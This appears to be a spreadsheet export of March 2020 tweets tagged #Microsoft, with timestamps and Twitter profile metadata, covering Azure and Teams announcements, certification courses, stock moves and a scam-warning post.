    <t>{'id': 3168640634, 'id_str': '3168640634', 'name': 'Evgeny Belenky', 'screen_name': 'BelevgEvgeny', 'location': 'San Francisco, CA', 'description': 'VP, Security Community @Peerlyst - where #infosec professionals connect, share knowledge &amp; advance their #career for free! Check our #mobile app out!', 'url': 'https://t.co/K6itF0Ck3n', 'entities': {'url': {'urls': [{'url': 'https://t.co/K6itF0Ck3n', 'expanded_url': 'https://www.peerlyst.com', 'display_url': 'peerlyst.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4524, 'friends_count': 3984, 'listed_count': 487, 'created_at': 'Thu Apr 23 11:52:10 +0000 2015', 'favourites_count': 4137, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 45088,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'http://pbs.twimg.com/profile_images/1142911444184457221/PEAOWWyB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1142911444184457221/PEAOWWyB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3168640634/1563110912',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</si>
  <si>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21:49:02 +0000 2020</t>
  </si>
  <si>
    <t>Join us this Thursday for a #DevNation tech talk on hybrid #CloudNative #Java #microservices, distributed across #AWS, #GoogleCloudPlatform and #Microsoft #Azure, with real-time load-balancing and fail-over. #Kubernetes #Skupper https://t.co/fCyvuW7Xqy https://t.co/zaqe86AlQ7</t>
  </si>
  <si>
    <t>Tue Mar 03 21:46:01 +0000 2020</t>
  </si>
  <si>
    <t>#ICYMI Azure IoT Introduces seamless integration with Cisco IoT https://t.co/vvSDIyjuXz #Azure #Cloud #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 21:45:33 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Microsoft Releases March 2020 Office Updates With Fixes, Improvements:" https://t.co/Nmtxeyydwk
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Tue Mar 03 21:35:58 +0000 2020</t>
  </si>
  <si>
    <t>How to Install Citrix Virtual Apps 7 1909 at Microsoft Windows Server 2019 #Citrix #Virtual Apps #Windows Server 2019 #Microsoft https://t.co/7U2p0yB6P6</t>
  </si>
  <si>
    <t>Tue Mar 03 21:35:33 +0000 2020</t>
  </si>
  <si>
    <t>How Microsoft Has Impressed Like most people who grew up in the 90s and 00s, I often associated Microsoft with products such as Windows XP, O... #deployment #software #database #microsoft #ubuntu #apple #github #gitlab #yaml https://t.co/NARUuezXha https://t.co/WvuTgUuhN5</t>
  </si>
  <si>
    <t>{'id': 3241502880, 'id_str': '3241502880', 'name': 'DevOpsChat', 'screen_name': 'devops_chat', 'location': 'Global', 'description': 'DevOps Slack Chat for Server Lovers. managed by @smayzes. The people who brought you @larachatslack.', 'url': 'http://t.co/wrWJQL9v6O', 'entities': {'url': {'urls': [{'url': 'http://t.co/wrWJQL9v6O', 'expanded_url': 'http://devopschat.co', 'display_url': 'devopschat.co', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1120, 'friends_count': 4925, 'listed_count': 45, 'created_at': 'Wed Jun 10 17:17:15 +0000 2015', 'favourites_count': 261, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5202,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'http://pbs.twimg.com/profile_images/1063245407222788097/HbN1QP3v_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1063245407222788097/HbN1QP3v_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3241502880/1542332414', 'profile_link_color': 'EF632F',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</si>
  <si>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21:35:31 +0000 2020</t>
  </si>
  <si>
    <t>Is Microsoft leaving us vulnerable to cyber attacks by pricing windows 10 so high? I like many people still run windows 7 and opted out of the free upgrade while the product was still in its beta phase. For good reason. Thoughts?
#Microsoft #Windows10 #Windows7</t>
  </si>
  <si>
    <t>{'id': 1013438424672448512, 'id_str': '1013438424672448512', 'name': 'TheRogueTheorist', 'screen_name': 'RogueTheorist', 'location': 'United States', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 65, 'listed_count': 0, 'created_at': 'Sun Jul 01 15:05:23 +0000 2018', 'favourites_count': 243, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 154, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1015347622670823425/IwxV_8mI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1015347622670823425/IwxV_8mI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1013438424672448512/1530912711',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</si>
  <si>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21:32:05 +0000 2020</t>
  </si>
  <si>
    <t>My latest #vlog fro0m #PAXEast2020 is out! See what pax has to offer and all the cool things i did in boston. Thanks again #Microsoft and #mixer It was a awesome time. Go like and comment https://t.co/X5XWGff41A</t>
  </si>
  <si>
    <t>{'id': 1602265992, 'id_str': '1602265992', 'name': 'Sniping For Dom', 'screen_name': 'SnipingForDom', 'location': 'Youtube.com/c/snipingfordomtv', 'description': 'MixerPartnerðŸŽ®ProGamerðŸŽ® I Make Kids Rage Powered By: @gamersupps @kontrolfreeks @gtomegaracing @airdropcrates @jerkypro', 'url': 'https://t.co/HhqFN7WyL4', 'entities': {'url': {'urls': [{'url': 'https://t.co/HhqFN7WyL4', 'expanded_url': 'http://www.mixer.com/snipingfordom', 'display_url': 'mixer.com/snipingfordom', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4664, 'friends_count': 604, 'listed_count': 43, 'created_at': 'Thu Jul 18 01:49:21 +0000 2013', 'favourites_count': 13102, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8791,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'http://pbs.twimg.com/profile_images/1149789113773674496/cg7muTHa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1149789113773674496/cg7muTHa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1602265992/1573141603',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</si>
  <si>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21:32:02 +0000 2020</t>
  </si>
  <si>
    <t>Stocks fall despite Fed intervention, dragging tech shares down once again https://t.co/PBAZn4mLPk #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 21:31:02 +0000 2020</t>
  </si>
  <si>
    <t>This #TaniumCommunity article will guide you in using Tanium to determine whether systems have active #Microsoft ESUs, to update them to support ESUs, and to activate ESU license keys on these systems: https://t.co/sBX5YPMOls https://t.co/DUJycKyVLs
 Tanium (Tanium) March ...</t>
  </si>
  <si>
    <t>{'id': 542880468, 'id_str': '542880468', 'name': 'Josh Schofield', 'screen_name': 'imPOSHster', 'location': 'Tampa, FL', 'description': 'PowerShell, Fast Cars, Sports, Technology Automation, and you get it :) -- Disclaimer: My posts, shares, retweets, etc. are mine and not the company I work for', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 244, 'friends_count': 240, 'listed_count': 63, 'created_at': 'Sun Apr 01 19:34:46 +0000 2012', 'favourites_count': 225, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4577,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'http://pbs.twimg.com/profile_images/698234577488384000/3qANb6XN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/698234577488384000/3qANb6XN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/542880468/1400725897',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</si>
  <si>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21:29:01 +0000 2020</t>
  </si>
  <si>
    <t>'Developers have lost hope #Microsoft will do the right thing'... Redmond urged to make #WinUI cross-platform https://t.co/NT9sWahwzK @theregister</t>
  </si>
  <si>
    <t>{'id': 122122818, 'id_str': '122122818', 'name': 'Joe Ingeno', 'screen_name': 'JoeIngeno', 'location': 'Florida, USA', 'description': "Software Architect | Developer | Author of Software Architect's Handbook https://t.co/6wlrMhW1Xc", 'url': 'https://t.co/buG6kZJUKw', 'entities': {'url': {'urls': [{'url': 'https://t.co/buG6kZJUKw', 'expanded_url': 'https://ingeno.io/', 'display_url': 'ingeno.io', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/6wlrMhW1Xc', 'expanded_url': 'http://bit.ly/2QPjjLj', 'display_url': 'bit.ly/2QPjjLj', 'indices': [73, 96]}]}}, 'protected': False, 'followers_count': 58509, 'friends_count': 5701, 'listed_count': 1426, 'created_at': 'Thu Mar 11 17:26:15 +0000 2010', 'favourites_count': 3334, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 22443, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '2F577A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/378800000592282043/b59c0ce84df76e778085fd418022d04e_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000592282043/b59c0ce84df76e778085fd418022d04e_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/122122818/1536468410', 'profile_link_color': '2F577A', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '1B1F22', 'profile_text_color': '074991', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 21:28:16 +0000 2020</t>
  </si>
  <si>
    <t>This #TaniumCommunity article will guide you in using Tanium to determine whether systems have active #Microsoft ESUs, to update them to support ESUs, and to activate ESU license keys on these systems: https://t.co/mWsV29sWXM https://t.co/zrR5drfQKC</t>
  </si>
  <si>
    <t>{'id': 10247892, 'id_str': '10247892', 'name': 'Simon Mullis', 'screen_name': 'smullis', 'location': 'Tanium, Inc.', 'description': 'Technical Director at Tanium. Live in Amsterdam. Tweets are my own. Talking #infosec, #cyber #bass and #cooking. My #vim .vimrc was started in the last century', 'url': 'https://t.co/m8pw5r0j2R', 'entities': {'url': {'urls': [{'url': 'https://t.co/m8pw5r0j2R', 'expanded_url': 'http://www.simonmullis.com/', 'display_url': 'simonmullis.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 323, 'friends_count': 666, 'listed_count': 30, 'created_at': 'Wed Nov 14 14:49:06 +0000 2007', 'favourites_count': 130, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5033,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'http://pbs.twimg.com/profile_images/686520116255657984/MCGGtEFp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/686520116255657984/MCGGtEFp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/10247892/1548680334',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</si>
  <si>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21:28:07 +0000 2020</t>
  </si>
  <si>
    <t>New #Microsoft #PowerToys version 0.15.0 released for #Windows10 #MicrosoftPowerToys 
See: https://t.co/hfUyh42ZyB</t>
  </si>
  <si>
    <t>Tue Mar 03 21:23:37 +0000 2020</t>
  </si>
  <si>
    <t>4. Evolve and interrogate your process
5. Remember that its not just you
#Optimus #Business #Transformation #BeaGuru #DigitalTransformation #Office365 #PowerBi #Azure #Microsoft #Software #LinkedInTT #Caribbean #Intcomex #Jamaica #Kingston</t>
  </si>
  <si>
    <t>Tue Mar 03 21:21:43 +0000 2020</t>
  </si>
  <si>
    <t>a bear's song &amp;gt; #MAGA ...
#Microsoft $MSFT ( -4.95% )
#Apple $AAPL ( -3.21% )
#Google $GOOGL ( -3.48% )
#Amazon $AMZN ( -2.31% ) https://t.co/58KiFIFMYF</t>
  </si>
  <si>
    <t>{'id': 1916659826, 'id_str': '1916659826', 'name': 'Wolf of Coin Street on steroids ^^', 'screen_name': 'BNF75', 'location': 'France', 'description': '#TechnicalAnalysis (@birboul): It never troubles the #Wolf how many the sheep may be. -- Virgil --\nPS: #MarketMaker2020 #BNF75 #Leader2Leaders^^ #Birboul_Chart', 'url': 'https://t.co/Kkdo6pdUSh', 'entities': {'url': {'urls': [{'url': 'https://t.co/Kkdo6pdUSh', 'expanded_url': 'https://www.google.fr/search?q=birboul2', 'display_url': 'google.fr/search?q=birboâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3002, 'friends_count': 78, 'listed_count': 10, 'created_at': 'Sun Sep 29 09:17:08 +0000 2013', 'favourites_count': 9274, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 24588,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'http://pbs.twimg.com/profile_images/1228779422716698629/39wwS704_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228779422716698629/39wwS704_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1916659826/1399221544',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'regular'}</t>
  </si>
  <si>
    <t>Tue Mar 03 21:20:48 +0000 2020</t>
  </si>
  <si>
    <t>#html #html5 #application #development #fundamentals # #mta #exam98_375 #course #certification #exam #microsoft #author #marklong
Learn more: https://t.co/ARKRW1FGWB</t>
  </si>
  <si>
    <t>{'id': 2159721, 'id_str': '2159721', 'name': 'Virtual Training Co.', 'screen_name': 'vtc', 'location': 'Stephens City, VA', 'description': 'VTC is a leader in self-paced software training for the working professional, student, or hobbyist. Follow us for updates about VTC.\n\nhttps://t.co/lMHAoq30xE', 'url': 'http://t.co/4P7lYU46fT', 'entities': {'url': {'urls': [{'url': 'http://t.co/4P7lYU46fT', 'expanded_url': 'http://www.vtc.com', 'display_url': 'vtc.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/lMHAoq30xE', 'expanded_url': 'http://fb.com/VTCOnlineUniversity', 'display_url': 'fb.com/VTCOnlineUniveâ€¦', 'indices': [134, 157]}]}}, 'protected': False, 'followers_count': 1048, 'friends_count': 229, 'listed_count': 61, 'created_at': 'Sun Mar 25 06:25:09 +0000 2007', 'favourites_count': 427, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2031, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '2484C6', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/828919095521210370/IUtwu4on_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/828919095521210370/IUtwu4on_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2159721/1486464731', 'profile_link_color': '000000', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '176691', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 21:18:25 +0000 2020</t>
  </si>
  <si>
    <t>What's new in #MSIntune - Week of March 2, 2020
- Bulk remote actions
... bulk commands for the following remote actions: restart, rename, Autopilot reset, sync, wipe, and delete
#Microsoft #MEM
https://t.co/uhVY4zaKdD</t>
  </si>
  <si>
    <t>{'id': 4217108410, 'id_str': '4217108410', 'name': 'Oliver Kieselbach', 'screen_name': 'okieselb', 'location': 'FFM Area, Germany', 'description': 'Microsoft MVP - Enterprise Mobility | Modern IT â€“ Cloud â€“ Workplace | https://t.co/JrsHp67CtZ Blogger #EMS #MSIntune #AzureAD #ConfigMgr #MDT #Windows10', 'url': 'https://t.co/7T9pTyT6k7', 'entities': {'url': {'urls': [{'url': 'https://t.co/7T9pTyT6k7', 'expanded_url': 'https://oliverkieselbach.com/', 'display_url': 'oliverkieselbach.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/JrsHp67CtZ', 'expanded_url': 'http://SCConfigMgr.com', 'display_url': 'SCConfigMgr.com', 'indices': [70, 93]}]}}, 'protected': False, 'followers_count': 2483, 'friends_count': 206, 'listed_count': 57, 'created_at': 'Wed Nov 18 10:02:29 +0000 2015', 'favourites_count': 4975, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4127,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'http://pbs.twimg.com/profile_images/928942676103323648/0S88n7T8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/928942676103323648/0S88n7T8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4217108410/1553802856',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</si>
  <si>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21:17:41 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT dominated by bears dragging the market lower throughout the day: https://t.co/aUdJzJpPNA
Sentiment: Slightly bearish #MSFT #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 21:13:41 +0000 2020</t>
  </si>
  <si>
    <t>Anybody know anything about the Security Intelligence patch to the Win Defender application....it almost sounds like something new that I would love more details about for both personal and work purposes?
Anyone? #Windows10 #windowsinsiders #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1024191520763604992, 'id_str': '1024191520763604992', 'name': 'Jon Case', 'screen_name': 'HumanMalware', 'location': 'The Moon', 'description': 'Warfare focused - Social Engineering Instructor - Multi skilled in several fields - Probably in some other country', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4569, 'friends_count': 932, 'listed_count': 45, 'created_at': 'Tue Jul 31 07:14:21 +0000 2018', 'favourites_count': 12930, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 15229, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1092732708038590464/0gw62iTD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1092732708038590464/0gw62iTD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1024191520763604992/1551200936',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</si>
  <si>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21:11:46 +0000 2020</t>
  </si>
  <si>
    <t>Final notice refund scam - (713) 324-6571 - #Scammer #Scambait #TSU #Refund #Scam #Info #Information #Windows #Microsoft - https://t.co/3K0jSsZddx</t>
  </si>
  <si>
    <t>Tue Mar 03 21:11:18 +0000 2020</t>
  </si>
  <si>
    <t>This #TaniumCommunity article will guide you in using @Tanium to determine whether systems have active #Microsoft ESUs, to update them to support ESUs, and to activate ESU license keys on these systems: https://t.co/dbY4eBuIE8 https://t.co/PuyaMQVkwC</t>
  </si>
  <si>
    <t>{'id': 285311730, 'id_str': '285311730', 'name': 'Tanium', 'screen_name': 'Tanium', 'location': 'Emeryville, CA', 'description': 'Follow this account for the latest #Tanium news, tech tips for #ITops and #Security teams, #CONVERGE2020 updates and how #WeAreTanium.', 'url': 'https://t.co/kwKnX83FYg', 'entities': {'url': {'urls': [{'url': 'https://t.co/kwKnX83FYg', 'expanded_url': 'http://www.tanium.com/converge', 'display_url': 'tanium.com/converge', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5705, 'friends_count': 471, 'listed_count': 247, 'created_at': 'Wed Apr 20 22:50:59 +0000 2011', 'favourites_count': 1718, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2793, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'A9A9A9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1218160793985994752/-QgLVWsS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218160793985994752/-QgLVWsS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/285311730/1579266670', 'profile_link_color': 'AA0000',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</si>
  <si>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21:07:25 +0000 2020</t>
  </si>
  <si>
    <t>Free Windows Server 2019 https://t.co/cYq6JFN5y4 via @YouTube #Free #Microsoft #Windows #Server #2019</t>
  </si>
  <si>
    <t>Tue Mar 03 21:05:35 +0000 2020</t>
  </si>
  <si>
    <t>It's time to maximize your Microsoft investment. #Microsoft https://t.co/vVQJjsvwla https://t.co/9x0FU1nc2v</t>
  </si>
  <si>
    <t>{'id': 1231877142, 'id_str': '1231877142', 'name': 'ElevatePoint', 'screen_name': 'ElevatePoint', 'location': 'Denver, CO', 'description': 'We create modern SharePoint intranets #EmployeeEngagement #Intranet #InternalComms #Communications #IT #SharePoint', 'url': 'http://t.co/ocPedazo4X', 'entities': {'url': {'urls': [{'url': 'http://t.co/ocPedazo4X', 'expanded_url': 'http://elevatepoint.com', 'display_url': 'elevatepoint.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5540, 'friends_count': 6298, 'listed_count': 368, 'created_at': 'Fri Mar 01 23:01:01 +0000 2013', 'favourites_count': 10944, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7977,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'http://pbs.twimg.com/profile_images/819308706210795520/y4wgiWHI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/819308706210795520/y4wgiWHI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1231877142/1544817599', 'profile_link_color': '43737D',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</si>
  <si>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21:05:32 +0000 2020</t>
  </si>
  <si>
    <t>AZ-204 Developing Solutions for #Microsoft #Azure Certification Exam (New in 2020!)
 #developer #AzureFamily
https://t.co/kfjU9uHH8y</t>
  </si>
  <si>
    <t>Tue Mar 03 21:04:59 +0000 2020</t>
  </si>
  <si>
    <t>OpsCompasss secures $6.8 million Series A funding led by Elsewhere Partners.
Managing your Cloud Posture with OpsCompass.  
https://t.co/p5CJXaRdrH
#multicloud #cloudsecurity #cloudadoption #cloudgovernance #azure #cloudadministration #cloudcompliance #microsoft #compliance https://t.co/JWIIICNaoI</t>
  </si>
  <si>
    <t>{'id': 2377513854, 'id_str': '2377513854', 'name': 'Stephen Young', 'screen_name': 'syoungma', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 26, 'listed_count': 0, 'created_at': 'Fri Mar 07 18:47:59 +0000 2014', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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</si>
  <si>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Tue Mar 03 21:04:18 +0000 2020</t>
  </si>
  <si>
    <t>The hidden history of #Microsoft and #Facebook, and what it says about the social networks... https://t.co/dJNbF4awbk</t>
  </si>
  <si>
    <t>Tue Mar 03 21:03:15 +0000 2020</t>
  </si>
  <si>
    <t>Azure Database for PostgreSQLPlanned maintenance notifications now in preview https://t.co/awKnGRQp7q  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Tue Mar 03 21:02:22 +0000 2020</t>
  </si>
  <si>
    <t>New #sessions have been published in building full client side #application with #Blazor #Webassembly from scratch @aspnet 
#dotnet #dotnetcore #microsoft #spa #technology #courses #youtube #akacademy
https://t.co/qfDJxJ4eI8 https://t.co/QkXrvcuBDI</t>
  </si>
  <si>
    <t>Tue Mar 03 21:02:19 +0000 2020</t>
  </si>
  <si>
    <t>Some awesome CPD tonight on #Microsoft #Teams. New to the programme but super impressed with its capability and range of functions! Excited to explore this further! Anyone with any experience, Id love to hear your thoughts!</t>
  </si>
  <si>
    <t>{'id': 858046873436913665, 'id_str': '858046873436913665', 'name': 'Mr Fearn', 'screen_name': 'MrLfearn', 'location': 'Warsaw, Poland', 'description': 'Assistant Head, Director of Sport and Head of Year @TBSwarsaw.', 'url': 'https://t.co/Ot4AGHQ7Xj', 'entities': {'url': {'urls': [{'url': 'https://t.co/Ot4AGHQ7Xj', 'expanded_url': 'https://www.justgiving.com/crowdfunding/louis-fearn?utm_term=b96dRbmB4', 'display_url': 'justgiving.com/crowdfunding/lâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 124, 'friends_count': 181, 'listed_count': 1, 'created_at': 'Fri Apr 28 19:54:51 +0000 2017', 'favourites_count': 562, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 690, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1178237292193996801/bltgT9Gg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1178237292193996801/bltgT9Gg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/858046873436913665/1569748636',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</si>
  <si>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21:00:30 +0000 2020</t>
  </si>
  <si>
    <t>"79% of analytics users encounter data questions they can't solve each month." 
How are you helping your team to uncover insights from data? 
Find out how to transform data into insights: https://t.co/QJAtgiU9XO
#AzureSQL #tech @Azure #data #Microsoft https://t.co/sOniFoqng1</t>
  </si>
  <si>
    <t>Why Mom was right about Dynamics 365 Business Central
https://t.co/tjnZz9F6T2
#MSDyn365bc #ERP #mom #Microsoft @Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 20:59:59 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft drops #Cortana consumer skills in new #Windows10 update  #Tech #VocalAssistant https://t.co/Roazlmi8hA by @verge</t>
  </si>
  <si>
    <t>{'id': 2205639907, 'id_str': '2205639907', 'name': 'StarDust Testing', 'screen_name': 'stardust_test', 'location': 'Canada &amp; France', 'description': 'Providing #QualityAssurance #testing services across North America and Europe.', 'url': 'https://t.co/oDE2jIqdfO', 'entities': {'url': {'urls': [{'url': 'https://t.co/oDE2jIqdfO', 'expanded_url': 'https://www.stardust-testing.com/en/', 'display_url': 'stardust-testing.com/en/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 238, 'friends_count': 326, 'listed_count': 15, 'created_at': 'Wed Nov 20 21:34:05 +0000 2013', 'favourites_count': 115, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1798,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'http://pbs.twimg.com/profile_images/378800000770509542/f27d13f9eda01530a9b65ed1023bf49b_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000770509542/f27d13f9eda01530a9b65ed1023bf49b_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2205639907/1544177541',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</si>
  <si>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20:57:22 +0000 2020</t>
  </si>
  <si>
    <t>Azure Database for PostgreSQLPlanned maintenance notifications now in preview https://t.co/qKMdC3fIIe #Microsoft #Azure</t>
  </si>
  <si>
    <t>Tue Mar 03 20:57:05 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Tech Community Update Mar 2nd, 2020 https://t.co/WLG2SCBa0w #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 20:56:48 +0000 2020</t>
  </si>
  <si>
    <t>War against #coronavirus #covid19 #wuhan #china #beijing #world #who #health #medicine #charity #dangote #foundation #amazon #microsoft #apple #un #usa #uk @ Kano, Nigeria https://t.co/Jm1ftooaPW</t>
  </si>
  <si>
    <t>{'id': 368906062, 'id_str': '368906062', 'name': 'hamza_gambo', 'screen_name': 'hamza_gambo', 'location': 'kano nigeria', 'description': 'good &amp; simple. BBM ID 7E01B1FF', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 662, 'friends_count': 2417, 'listed_count': 4, 'created_at': 'Tue Sep 06 12:43:02 +0000 2011', 'favourites_count': 228, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6804,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'http://pbs.twimg.com/profile_images/1104134542909165573/Y8mqHzhr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1104134542909165573/Y8mqHzhr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/368906062/1559682827',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</si>
  <si>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20:56:07 +0000 2020</t>
  </si>
  <si>
    <t>Don't miss Philly Microsoft Teams Day!  Register now! https://t.co/y496EcbaVC
Connect with me: https://t.co/pH9JA1IzcX
#MicrosoftTeams #SharePoint #microsoft #business #technology #Philadelphia https://t.co/BcgS3FTkuX</t>
  </si>
  <si>
    <t>{'id': 15454573, 'id_str': '15454573', 'name': 'russbasiura', 'screen_name': 'russbasiura', 'location': '', 'description': '', 'url': 'https://t.co/9UkCdEO11F', 'entities': {'url': {'urls': [{'url': 'https://t.co/9UkCdEO11F', 'expanded_url': 'http://www.russbasiura.com', 'display_url': 'russbasiura.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 60, 'friends_count': 400, 'listed_count': 4, 'created_at': 'Wed Jul 16 14:11:19 +0000 2008', 'favourites_count': 481, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 521,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'http://pbs.twimg.com/profile_images/982689795490177024/M7nQHQ59_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/982689795490177024/M7nQHQ59_normal.jpg',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</si>
  <si>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20:53:46 +0000 2020</t>
  </si>
  <si>
    <t>Azure Database for PostgreSQLPlanned maintenance notifications now in preview  https://t.co/gF1dTWgqLP  #azure #microsoft</t>
  </si>
  <si>
